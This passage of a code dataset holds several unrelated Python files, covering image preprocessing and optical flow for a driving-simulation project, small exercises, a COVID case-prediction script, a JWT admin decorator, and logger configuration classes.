point[4]\r\n camera_coord_z2 = point[5]\r\n\r\n x1 = 1099 / 2 - camera_coord_x1 * focus / camera_coord_z1\r\n # result_y[y, x] =599 / 2 - camera_coord_y * focus / camera_coord_z\r\n y1 = 299 / 2 - camera_coord_y1 * focus / camera_coord_z1\r\n\r\n x2 = 1099 / 2 - camera_coord_x2 * focus / camera_coord_z2\r\n # result_y[y, x] =599 / 2 - camera_coord_y * focus / camera_coord_z\r\n y2 = 299 / 2 - camera_coord_y2 * focus / camera_coord_z2\r\n\r\n cv2.line(image_now_cut, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 250), 4)\r\n\r\n return image_now_cut\r\n\r\n\r\ndef lidar_result_fusion(image, marker, marker_ground_ref):\r\n marker_tracked = marker['marker_tracked']\r\n marker_candidate = marker['marker_candidate']\r\n marker_candidate2 = marker['marker_candidate2']\r\n marker_s_tracked = marker['marker_s_tracked']\r\n marker_s_candidate = marker['marker_s_candidate']\r\n marker_s_candidate2 = marker['marker_s_candidate2']\r\n\r\n def set_color(image_c, marker, value):\r\n image_c[marker[:, 1], marker[:, 0]] = value\r\n image_c[marker[:, 1] + 1, marker[:, 0]] = value\r\n image_c[marker[:, 1] - 1, marker[:, 0]] = value\r\n image_c[marker[:, 1], marker[:, 0] + 1] = value\r\n image_c[marker[:, 1], marker[:, 0] - 1] = value\r\n return image_c\r\n\r\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n\r\n rounded_marker_ground = np.round(marker_ground_ref).astype(dtype=int)\r\n if rounded_marker_ground.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_ground, 0)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_ground, 0)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_ground, 0)\r\n\r\n rounded_marker_tracked = np.round(marker_tracked).astype(dtype=int)\r\n rounded_marker_candidate = np.round(marker_candidate).astype(dtype=int)\r\n rounded_marker_candidate2 = np.round(marker_candidate2).astype(dtype=int)\r\n if rounded_marker_tracked.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_tracked, 0)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_tracked, 0)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_tracked, 255)\r\n\r\n if rounded_marker_candidate.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_candidate, 0)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_candidate, 255)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_candidate, 255)\r\n\r\n if rounded_marker_candidate2.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_candidate2, 0)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_candidate2, 150)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_candidate2, 255)\r\n\r\n rounded_marker_s_tracked = np.round(marker_s_tracked).astype(dtype=int)\r\n rounded_marker_s_candidate = np.round(marker_s_candidate).astype(dtype=int)\r\n rounded_marker_s_candidate2 = np.round(marker_s_candidate2).astype(dtype=int)\r\n if rounded_marker_s_tracked.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_s_tracked, 255)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_s_tracked, 0)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_s_tracked, 0)\r\n\r\n if rounded_marker_s_candidate.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_s_candidate, 255)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_s_candidate, 200)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_s_candidate, 100)\r\n\r\n if rounded_marker_s_candidate2.size != 0:\r\n image[..., 0] = 
set_color(image[..., 0], rounded_marker_s_candidate2, 0)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_s_candidate2, 255)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_s_candidate2, 0)\r\n\r\n\r\n #image_monitor = np.concatenate((image_monitor_b, image_monitor_g, image_monitor_r), axis=2)\r\n #image_monitor = cv2.add(image_monitor, cv2.cvtColor(image_now_cut, cv2.COLOR_GRAY2RGB))\r\n\r\n return image\r\n\r\n\r\ndef opt_flow(image_1, image_2, Mode='all'):\r\n image_shape = list(image_1.shape)\r\n image_shape.append(3)\r\n hsv_shape = tuple(image_shape)\r\n hsv_0 = np.zeros(hsv_shape)\r\n hsv_0[..., 1] = 255\r\n\r\n gamma = 3\r\n #image_1 = cv2.GaussianBlur(image_1, (5, 5), 0.5)\r\n #image_2 = cv2.GaussianBlur(image_2, (5, 5), 0.5)\r\n flow = cv2.calcOpticalFlowFarneback(image_1, image_2, None, 0.5, 5, # pyr_scale, levels\r\n 20, 5, 5, 1.2, 0)\r\n # winsize, iterations, poly_n, poly_sigma, flags\r\n\r\n magnitude, angle = cv2.cartToPolar(-flow[..., 0], -flow[..., 1], angleInDegrees=True)\r\n\r\n if Mode == 'all':\r\n hsv = hsv_0\r\n hsv[..., 0] = angle / 2\r\n hsv[..., 2] = cv2.normalize(magnitude, None, 0, 1, cv2.NORM_MINMAX)\r\n hsv[..., 2] = 255 * hsv[..., 2] ** (1 / gamma)\r\n hsv = np.uint8(hsv)\r\n image_flow = cv2.cvtColor(hsv, cv2.COLOR_HSV2RGB)\r\n\r\n return magnitude, angle, image_flow\r\n elif Mode == 'normal':\r\n return magnitude, angle\r\n\r\n # if cv2.waitKey(5) & 0xFF == ord('q'):\r\n # cv2.destroyAllWindows()\r\n # break\r\n\r\n\r\ndef opt_flow2(image1, image2):\r\n image1 = image1.astype(float) / 255.\r\n image2 = image2.astype(float) / 255.\r\n\r\n image1 = np.expand_dims(image1, axis=2)\r\n image2 = np.expand_dims(image2, axis=2)\r\n\r\n # for full res\r\n #alpha = 0.012\r\n #ratio = 0.5\r\n #minWidth = 10\r\n #nOuterFPIterations = 2\r\n #nInnerFPIterations = 2\r\n #nSORIterations = 3\r\n\r\n alpha = 0.015\r\n ratio = 0.5\r\n minWidth = 10\r\n nOuterFPIterations = 2\r\n nInnerFPIterations = 2\r\n nSORIterations = 3\r\n\r\n\r\n colType = 1 # 0 or default:RGB, 1:GRAY (but pass gray image with shape (h,w,1))\r\n\r\n s = time.time()\r\n u, v, im2W = pyflow.coarse2fine_flow(\r\n image1, image2, alpha, ratio, minWidth, nOuterFPIterations, nInnerFPIterations,\r\n nSORIterations, colType)\r\n e = time.time()\r\n print('Time Taken: %.2f seconds for image of size (%d, %d, %d)' % (\r\n e - s, image1.shape[0], image1.shape[1], image1.shape[2]))\r\n flow = np.concatenate((-u[..., None], -v[..., None]), axis=2) # reversed direction, from image 2 flow to image 1\r\n\r\n gamma = 3\r\n hsv = np.zeros([image1.shape[0], image1.shape[1], 3])\r\n hsv[:, :, 0] = 255\r\n hsv[:, :, 1] = 255\r\n mag, ang = cv2.cartToPolar(flow[..., 0], flow[..., 1])\r\n\r\n hsv[..., 0] = ang * 180 / np.pi / 2\r\n hsv[..., 2] = cv2.normalize(mag, None, 0, 1, cv2.NORM_MINMAX)\r\n hsv[..., 2] = 255 * hsv[..., 2] ** (1 / gamma)\r\n hsv = np.uint8(hsv)\r\n img_flow = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)\r\n return mag, ang / np.pi * 180, img_flow\r\n\r\n\r\nclass Optical_flow:\r\n def __init__(self):\r\n self.initialized = 0\r\n self.image_now = None\r\n self.image_last = None\r\n\r\n def input(self, image):\r\n self.image_now = image\r\n\r\n def imshow(self):\r\n plt.figure()\r\n plt.subplot(2, 1, 1)\r\n plt.imshow(self.image_last)\r\n plt.subplot(2, 1, 2)\r\n plt.imshow(self.image_now)\r\n\r\n def run(self):\r\n if self.initialized == 0:\r\n if self.image_now is not None:\r\n self.initialized = 1\r\n self.image_last = self.image_now\r\n return None, None, None\r\n\r\n mag, dir, img_flow 
= opt_flow2(self.image_now, self.image_last)\r\n self.image_last = self.image_now\r\n return mag, dir, img_flow\r\n\r\ndef depth_flow(image_1, image_2, dt):\r\n flow = (image_2 - image_1) / dt\r\n return flow\r\n\r\n\r\ndef coord_trans(depth_image, Lidar_info, Camera_info1): # data fusion (transform LiDAR coord to camera coord, then to image coord)\r\n\r\n upper_lim = Lidar_info['upper_lim']\r\n focus = Camera_info1['focus']\r\n h_sample = Camera_info1['h_sample']\r\n v_sample = Camera_info1['v_sample']\r\n y_sample = Lidar_info['y_sample']\r\n x_sample = Lidar_info['x_sample']\r\n x_sample_deg = Lidar_info['x_sample_deg']\r\n y_sample_deg = Lidar_info['y_sample_deg']\r\n\r\n row_lidar, col_lidar = (np.indices((y_sample, x_sample))).astype('float32')\r\n theta, phi = find_lidar_theta_phi_from_coord_Ma(row_lidar, col_lidar, x_sample, x_sample_deg, y_sample_deg, upper_lim)\r\n\r\n camera_coord_x, camera_coord_y, camera_coord_z = polar_to_cartesian(depth_image, theta, phi)\r\n\r\n reference_x =(h_sample-1) / 2 - camera_coord_x * focus / camera_coord_z\r\n reference_y = (v_sample-1) / 2 - camera_coord_y * focus / camera_coord_z\r\n\r\n return reference_x, reference_y\r\n\r\n\r\ndef edge_detect1(image): # both side, outer edge\r\n # image = np.uint8(image)\r\n kernel = [1, -1]\r\n height = image.shape[0]\r\n width = image.shape[1]\r\n\r\n # vertical filter\r\n v_filtered_image_1 = np.empty_like(image)\r\n for h in range(height):\r\n if h + 1 < height:\r\n for w in range(width):\r\n v_filtered_image_1[h, w] = image[h, w] * kernel[0] + image[h + 1, w] * kernel[1]\r\n if v_filtered_image_1[h, w] < 0:\r\n v_filtered_image_1[h, w] = 0\r\n\r\n else:\r\n for w in range(width):\r\n v_filtered_image_1[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n if v_filtered_image_1[h, w] < 0:\r\n v_filtered_image_1[h, w] = 0\r\n\r\n v_filtered_image_2 = np.empty_like(image)\r\n for h in range(height):\r\n if h > 0:\r\n for w in range(width):\r\n v_filtered_image_2[h, w] = image[h, w] * kernel[0] + image[h - 1, w] * kernel[1]\r\n if v_filtered_image_2[h, w] < 0:\r\n v_filtered_image_2[h, w] = 0\r\n\r\n else:\r\n for w in range(width):\r\n v_filtered_image_2[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n if v_filtered_image_2[h, w] < 0:\r\n v_filtered_image_2[h, w] = 0\r\n\r\n v_filtered_image = v_filtered_image_2 + v_filtered_image_1\r\n\r\n # horizontal filter\r\n h_filtered_image_1 = np.empty_like(image)\r\n for w in range(width):\r\n if w + 1 < width:\r\n for h in range(height):\r\n h_filtered_image_1[h, w] = image[h, w] * kernel[0] + image[h, w + 1] * kernel[1]\r\n if h_filtered_image_1[h, w] < 0:\r\n h_filtered_image_1[h, w] = 0\r\n else:\r\n for h in range(height):\r\n h_filtered_image_1[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n if h_filtered_image_1[h, w] < 0:\r\n h_filtered_image_1[h, w] = 0\r\n\r\n h_filtered_image_2 = np.empty_like(image)\r\n for w in range(width):\r\n if w > 0:\r\n for h in range(height):\r\n h_filtered_image_2[h, w] = image[h, w] * kernel[0] + image[h, w - 1] * kernel[1]\r\n if h_filtered_image_2[h, w] < 0:\r\n h_filtered_image_2[h, w] = 0\r\n else:\r\n for h in range(height):\r\n h_filtered_image_2[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n if h_filtered_image_2[h, w] < 0:\r\n h_filtered_image_2[h, w] = 0\r\n\r\n h_filtered_image = h_filtered_image_1 + h_filtered_image_2\r\n\r\n return v_filtered_image, h_filtered_image\r\n\r\ndef edge_detect2(image, threshhold): # color filled\r\n kernel = [-1, 1]\r\n height = 
image.shape[0]\r\n width = image.shape[1]\r\n\r\n # vertical filter\r\n v_filtered_image = np.empty_like(image)\r\n for h in range(height):\r\n if h + 1 < height:\r\n for w in range(width):\r\n v_filtered_image[h, w] = image[h, w] * kernel[0] + image[h + 1, w] * kernel[1]\r\n\r\n else:\r\n for w in range(width):\r\n v_filtered_image[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n\r\n # horizontal filter\r\n h_filtered_image = np.empty_like(image)\r\n for w in range(width):\r\n if w + 1 < width:\r\n for h in range(height):\r\n h_filtered_image[h, w] = image[h, w] * kernel[0] + image[h, w + 1] * kernel[1]\r\n else:\r\n for h in range(height):\r\n h_filtered_image[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n\r\n h_filtered_image2 = np.empty_like(image)\r\n #threshhold = 20\r\n for h in range(height):\r\n value = 0\r\n h_filtered_image2[h, 0] = value\r\n for w in range(width - 1):\r\n if h_filtered_image[h, w] > threshhold:\r\n value += h_filtered_image[h, w]\r\n h_filtered_image2[h, w + 1] = value\r\n elif h_filtered_image[h, w] < -threshhold:\r\n value += h_filtered_image[h, w]\r\n h_filtered_image2[h, w + 1] = value\r\n else:\r\n h_filtered_image2[h, w + 1] = value\r\n\r\n return h_filtered_image, h_filtered_image2\r\n\r\ndef edge_detect3(lidar_img):\r\n #lidar_img = lidar_img / np.max(lidar_img) * 255\r\n edge_y = cv2.Sobel(lidar_img, cv2.CV_64F, 0, 2, ksize=1)\r\n edge_x = cv2.Sobel(lidar_img, cv2.CV_64F, 2, 0, ksize=1)\r\n #edge = np.append(np.expand_dims(edge_y, axis=2), np.expand_dims(edge_x, axis=2), axis=2)\r\n #edge = np.max(edge, axis=2)\r\n return edge_y, edge_x\r\n\r\n\r\n","repo_name":"Dongpeng-Ding/GTAV-Autonomy-","sub_path":"image_preprocess.py","file_name":"image_preprocess.py","file_ext":"py","file_size_in_byte":13763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14755006463","text":"'''\n[문제]\n 0에서 100사이의 랜덤 숫자를 시험 점수로 저장한다.\n 시험점수에 해당하는 학점을 출력하시오.\n 아래는 점수표이다.\n 100~91 이면 A학점,\n 90~81 이면 B학점,\n 80이하는 \"재시험\"\n \n 단, 만점이거나, A학점과 B학점의 일의 자리가 8점이상이면 + 기호를 추가하시오.\n [예] \n 100 => A+\n 88 ==> B+\n 82 ==> B\n 23 ==> 재시험\n'''\n'''\n 랜덤을 테스트할 때는 원하는 값이 나올 때까지 무한반복을 하게된다.\n 아래와 같이 일정 숫자가 나오도록 폭을 조정하면 테스트하기 쉽다. 
\n'''\n\n# 100(A+) / 98(A+) / 91(A) / 88(B+) / 82(B) / 51(재시험)\n\nimport random\nscore = random.randint(0,100)\nscore = 91\nprint(score)\n\n일 = score % 10\n\nresult = ''\nif score >= 91 :\n result = 'A'\n if 일 >= 8 or score == 100 :\n result += '+'\nelif score >= 81 :\n result = 'B'\n if 일 >= 8 :\n result += '+'\nelse :\n result = '재시험'\n \nprint(result)","repo_name":"jomira0220/study","sub_path":"jomira/00_문법총정리/Python_문제풀기/조건문/조건문4_개념01_중첩조건_학점.py","file_name":"조건문4_개념01_중첩조건_학점.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19628753779","text":"from typing import List, Optional\n\nfrom common.nats import publish\n\n\nasync def broadcast(service: str, event: str, **kwargs):\n \"\"\"\n Broadcast an automated event to all the task handlers\n :param service: the service that owns the event\n :param event: the event to trigger\n :param kwargs: any parameters to pass to the handlers\n \"\"\"\n await publish(f\"{service}.automated.{event}\", kwargs)\n\n\nclass TasksProxy(object):\n def __init__(self, previous: Optional[List[str]] = None):\n self.__previous = previous or []\n\n def __getattr__(self, item: str) -> \"TasksProxy\":\n if len(self.__previous) >= 2:\n raise AttributeError(f\"'tasks' object has no attribute {item!r}\")\n\n return TasksProxy(self.__previous + [item])\n\n async def __call__(self, **kwargs):\n assert len(self.__previous) == 2\n\n await publish(f\"{self.__previous[0]}.manual.{self.__previous[1]}\", kwargs)\n\n\n# Used for \"magically\" calling a task\ntasks = TasksProxy()\n","repo_name":"WaffleHacks/application-portal","sub_path":"common/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5829443786","text":"#\n# @lc app=leetcode.cn id=206 lang=python3\n#\n# [206] 反转链表\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n if not head or head.next == None: # 如果空链表或者只有1个,直接返回head即可\n return head\n # 此时链表长度 >= 2\n\n # 时间复杂度n,空间复杂度1\n # preNode = None\n # curNode = head\n # nextNode = head.next\n # # preNode.next = None # 把反转后末节点next置None\n # while curNode: # 下个节点非空,就继续反转\n # curNode.next = preNode\n # preNode = curNode\n # curNode = nextNode\n # if nextNode: # 如果nextNode为None,那么它没有next属性;下次遍历将curNode设为None后会结束循环 \n # nextNode = nextNode.next\n # return preNode\n\n # 将原链表逐个放到新链表,时间复杂度和空间复杂度均n,\n new = None\n while head:\n tmp = head\n head = head.next\n tmp.next = new\n new = tmp\n return new\n # head, head.next, new = head.next, new, head\n\n\n \n# @lc code=end\n\n","repo_name":"freemanwang/AlgorithmJS","sub_path":"206.反转链表.py","file_name":"206.反转链表.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39566665255","text":"import numpy as np\nimport pandas as pd\nimport csv\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndataset = pd.read_csv('https://api.covid19india.org/csv/latest/case_time_series.csv')\ndataset=dataset.dropna()\n# del dataset['Date']\n# del dataset['Month']\n\ndef listtostr(s): \n res = str(s)[1:-1] \n return (float(res))\n\ndef india_pred(i):\n \n 
X=[]\n y=[]\n y = dataset.iloc[:, i].values\n for n in range(1,len(y)+1):\n X.append([n])\n\n poly_reg = PolynomialFeatures(degree = 4)\n X_poly = poly_reg.fit_transform(X)\n poly_reg.fit(X_poly, y)\n lin_reg_2 = LinearRegression()\n lin_reg_2.fit(X_poly, y)\n growth_rate = np.exp(np.diff(np.log(y))) - 1\n str(list(growth_rate).pop()*100)+'%'\n growth_rate=str(\"{:.1f}\".format(list(growth_rate).pop()*100))+' %'\n prediction=lin_reg_2.predict(poly_reg.fit_transform([[len(y)+1]]))\n \n# plt.scatter(X, y, color = 'red')\n# predline=[]\n# for n in range(0,130):\n# predline.append([n])\n# #predline = predline[40:] \n# plt.plot(predline, lin_reg_2.predict(poly_reg.fit_transform(predline)), color = 'blue')\n\n# plt.title(dataset.columns[i])\n# plt.xlabel('Days')\n# plt.ylabel('Cases')\n# plt.show()\n\n return prediction,growth_rate\n \n \n \n# dataset = dataset[:-1]\nprediction=[]\ngrowth_rate=[]\ncurrent=[]\n \ndef pred_list():\n cols=[2,4,6]\n \n for i in cols:\n pred,grow =india_pred(i)\n prediction.append(listtostr(pred))\n growth_rate.append(grow) \n \n #print(prediction)\n #print(\"Next day prediction for India: \\n Cases: \"+\"{:.2f}\".format(prediction[0])+\" Recovered: \"+\"{:.2f}\".format(prediction[1])+\"Deaths: \"+\"{:.2f}\".format(prediction[2])+\" Case growth rate: \"+growth_rate[0])\n \n predicted_cases=prediction[0]\n predicted_recover=prediction[1]\n predicted_deaths=prediction[2]\n growth=growth_rate[0]\n \n return predicted_cases, predicted_deaths, predicted_recover,growth\n \n \npred_list()","repo_name":"aniketkamble30/covid_Yodha","sub_path":"india_pred.py","file_name":"india_pred.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39858713172","text":"def add_elements(o_num):\n\n l = [] # list with elements\n\n for i in range(1, o_num+1): # user enters each element\n el = int(input(f\"Enter element number {i}: \"))\n l.append(el)\n\n return l\n\n\ndef t(q, capacity):\n\n el = []\n\n p_faults = 0 # number of Page Faults\n no_p_faults = 0 \n\n for i in range(len(q)):\n \n c = 0 # counter to check if value in list\n\n for e in el:\n if e == q[i]:\n c = 1\n break\n else:\n c = 0\n \n if c == 0:\n \n if i < capacity:\n el.append(q[i])\n else:\n el.remove(el[0]) # changing first el (the one that was entered first) to a new value\n el.append(q[i])\n p_faults += 1\n\n else:\n no_p_faults += 1\n\n result = [el, p_faults, no_p_faults] # gathering all values\n\n return result\n\n\ndef main():\n\n o_num = int(input(\"Enter number of elements: \"))\n print()\n\n queue = add_elements(o_num) # adding elements to a queue\n print()\n\n capacity = int(input(\"Enter capacity: \")) # length of the list\n print()\n\n result = t(queue, capacity)\n\n print(\"List: \", result[0], \"; Page Faults: \", result[1], \"; no Page Faults: \", result[2])\n\n\nmain()\n","repo_name":"YanaBalyoshenko/PythonWorks","sub_path":"FIFO.py","file_name":"FIFO.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17514647877","text":"import unittest\nimport os\nimport re\nfrom TSPU import TSPU\n\n\ndef atoi(text):\n return int(text) if text.isdigit() else text\n\n\ndef natural_keys(text):\n \"\"\"\n :param text:\n list.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n \"\"\"\n return [atoi(c) for c in 
re.split('(\\d+)', text)]\n\n\nclass TSPUTest(unittest.TestCase):\n def testFun(self):\n for file in sorted(os.listdir(\"..//in\"), key=natural_keys):\n if file.endswith(\".txt\"):\n arquivo_saida_esperada = open('..//out//{name}'.format(name=file), 'r')\n tspu = TSPU()\n tspu.gerar_matriz('..//in//{name}'.format(name=file))\n tspu.gerar_caminho_minimo()\n caminho_esperado = arquivo_saida_esperada.read().strip()\n self.assertEqual(\n tspu.output_caminho_minimo(),\n caminho_esperado,\n '\\nArquivo: {nome_arquivo}'\n '\\nSaida: \\n{saida}'\n '\\nEsperado: \\n{esperado}'.format(\n nome_arquivo=file,\n saida=tspu.output_caminho_minimo(),\n esperado=caminho_esperado\n )\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"EduardoShibukawa/UEM","sub_path":"PAA/UVA - 116 - Unidirectional TS/Tests/TSPUTest.py","file_name":"TSPUTest.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37203702066","text":"def uklanjanje_razmaka(s):\n \"\"\"\n U datom stringu sve uzastopne blankove (ako ih ima više od jednog) zamijeniti jednim\n blankom. \n \"\"\"\n k = []\n s = s.split(\" \")\n for i in s:\n if i != '':\n k.append(i)\n return ' '.join(k)\n\nprint('sa uklonjenim razmacima je:',uklanjanje_razmaka(input(\"unesite recenicu iz koje trebaju da se uklone suvisni razmaci: \"))) ","repo_name":"mdrazen27/algoritmi_domaci2","sub_path":"uklanjanje_razmaka.py","file_name":"uklanjanje_razmaka.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15808507238","text":"from functools import wraps\nfrom flask_jwt_extended import JWTManager, verify_jwt_in_request, get_jwt_claims\nfrom flask_restful import abort\n\nfrom Models.Users.UserModel import UserModel\n\njwt = JWTManager()\n\ndef admin_required(fn):\n @wraps(fn)\n def wrapper(*args, **kwargs):\n verify_jwt_in_request()\n claims = get_jwt_claims()\n if claims['account_type'] != 'admin' or claims['account_type'] is None:\n abort(403)\n else:\n return fn(*args, **kwargs)\n return wrapper\n\n@jwt.user_claims_loader\ndef add_claims_to_access_token(identity):\n user = UserModel.get_user(login = identity)\n if user is None:\n return {'account_type' : None}\n if user.account_type == 'admin':\n return {'account_type' : 'admin'}\n else:\n return {'account_type' : 'user'}","repo_name":"cezary-kania/UploadIO-api","sub_path":"src/Utils/JWT.py","file_name":"JWT.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13526292415","text":"'''\n This code is to predict the original character from a perturbed character \n'''\nimport numpy as np\nimport pandas as pd\nfrom pandas.io.parsers import read_csv \n\ntrain_dict={}\ntest_dict={}\nsimilarity_dict={}\nerror_dict={}\ntest_file='noisy_test.csv'\ndef full_data():\n train_data=pd.read_csv('train.csv')\n for i in range(1,27):\n arr=[]\n for j in range(1,36):\n arr.append(train_data['x{}'.format(j)][i-1])\n train_dict[i]=arr\n \n # Testing Data\n test_data=pd.read_csv(test_file)\n test_length=len(test_data['x1'])\n for i in range(test_length):\n arr=[]\n for j in range(1,36):\n arr.append(test_data['x{}'.format(j)][i])\n test_dict['{}{}'.format(test_data['Label'][i],i)]=arr\n \n\n\n\n\ndef read_data():\n train_data=pd.read_csv('train.csv')\n for i in range(1,27):\n arr=[]\n for j in range(1,36):\n 
arr.append(train_data['x{}'.format(j)][i-1])\n        train_dict[i]=arr\n    \n    test_data=pd.read_csv(test_file)\n    for i in range(1,8):\n        arr=[]\n        for j in range(1,36):\n            arr.append(test_data['x{}'.format(j)][i-1])\n        test_dict[i]=arr \n\n\ndef cosine_similarity(vecA,vecB):\n    # vecA, vecB are 35-dimensional vectors\n    sum_sqrdA=0\n    sum_sqrdB=0\n    cosine_value=0\n    for i in range(len(vecA)):\n        sum_sqrdA+=vecA[i]**2\n        sum_sqrdB+=vecB[i]**2\n        cosine_value+=vecA[i]*vecB[i]\n    cosine_value=cosine_value/(np.sqrt(sum_sqrdA)*np.sqrt(sum_sqrdB))\n    return cosine_value\n\ndef print_similarity_dict():\n    file=open('similarity.txt','w')\n    for key,value in similarity_dict.items():\n        file.write(\"{}:{}\\n\".format(key,value))\n    file.close()\n    print(\"Similarity dictionary successfully printed!!\")\n    \n    # print(error_dict)\n    file1=open('error.txt','w')\n    for key,value in error_dict.items():\n        file1.write(\"{}:{}\\n\".format(key,value))\n    file1.close()\n    print(\"Error dictionary successfully printed!!\")\n    \n\ndef analyze():\n    total_count=0\n    true_count=0\n    for key,value in similarity_dict.items():\n        total_count+=1\n        if key[0]==value:\n            true_count+=1\n        else:\n            error_dict[key]=value\n    print(\"Correct prob.:{}({}/{}), Wrong Prob.:{}({}/{})\".format(true_count/total_count,true_count,total_count,1-true_count/total_count,total_count-true_count,total_count))\n\ndef check_similarity():\n    # read_data()\n    full_data()\n    character=['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n    for ts_key,ts_value in test_dict.items():\n        similarity=0\n        similar_with=0\n        for tr_key,tr_value in train_dict.items():\n            sim=cosine_similarity(ts_value,tr_value)\n            if sim>similarity:\n                similar_with=tr_key\n                similarity=sim\n        similarity_dict[ts_key]=character[similar_with-1]\n    # print(similarity_dict)\n    analyze()  # Call analyze() before print_similarity_dict(), otherwise error_dict will be empty\n    print_similarity_dict()\n    \n\ncheck_similarity()\n# full_data()","repo_name":"khritish17/Neuromorphic-Hardware-Design","sub_path":"Computational Work/CR Python codes/Comparision codes/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72638591528","text":"from __future__ import annotations\n\nfrom abc import ABC, abstractmethod\nfrom dataclasses import asdict, dataclass\nfrom typing import Any, Dict, List, Optional\n\nimport yahp as hp\n\nfrom composer.loggers.file_logger import FileLogger\nfrom composer.loggers.in_memory_logger import InMemoryLogger\nfrom composer.loggers.logger import LogLevel\nfrom composer.loggers.logger_destination import LoggerDestination\nfrom composer.loggers.object_store_logger import ObjectStoreLogger\nfrom composer.loggers.progress_bar_logger import ProgressBarLogger\nfrom composer.loggers.wandb_logger import WandBLogger\nfrom composer.utils import ObjectStoreHparams, import_object\n\n__all__ = [\n    \"FileLoggerHparams\",\n    \"InMemoryLoggerHparams\",\n    \"LoggerDestinationHparams\",\n    \"ProgressBarLoggerHparams\",\n    \"WandBLoggerHparams\",\n    \"ObjectStoreLoggerHparams\",\n    \"logger_registry\",\n]\n\n\n@dataclass\nclass LoggerDestinationHparams(hp.Hparams, ABC):\n    \"\"\"Base class for logger callback hyperparameters.\n\n    Logger parameters that are added to :class:`~.trainer_hparams.TrainerHparams` (e.g. 
via YAML or the CLI) are\n initialized in the training loop.\n \"\"\"\n\n @abstractmethod\n def initialize_object(self) -> LoggerDestination:\n \"\"\"Initializes the logger.\"\"\"\n pass\n\n\n@dataclass\nclass FileLoggerHparams(LoggerDestinationHparams):\n \"\"\":class:`~composer.loggers.file_logger.FileLogger`\n hyperparameters.\n\n See :class:`~composer.loggers.file_logger.FileLogger` for documentation.\n\n Args:\n filename (str, optional): See :class:`~composer.loggers.file_logger.FileLogger`.\n artifact_name (str, optional): See :class:`~composer.loggers.file_logger.FileLogger`.\n capture_stdout (bool, optional): See :class:`~composer.loggers.file_logger.FileLogger`.\n capture_stderr (bool, optional): See :class:`~composer.loggers.file_logger.FileLogger`.\n buffer_size (int, optional): See\n :class:`~composer.loggers.file_logger.FileLogger`.\n log_level (LogLevel, optional): See\n :class:`~composer.loggers.file_logger.FileLogger`.\n log_interval (int, optional): See\n :class:`~composer.loggers.file_logger.FileLogger`.\n flush_interval (int, optional): See\n :class:`~composer.loggers.file_logger.FileLogger`.\n \"\"\"\n log_level: LogLevel = hp.optional(\"The maximum verbosity to log. Default: EPOCH\", default=LogLevel.EPOCH)\n filename: str = hp.optional(\"Filename format string for the logfile.\", default='{run_name}/logs-rank{rank}.txt')\n artifact_name: Optional[str] = hp.optional(\"Artifact name format string for the logfile.\", default=None)\n capture_stdout: bool = hp.optional(\"Whether to capture writes 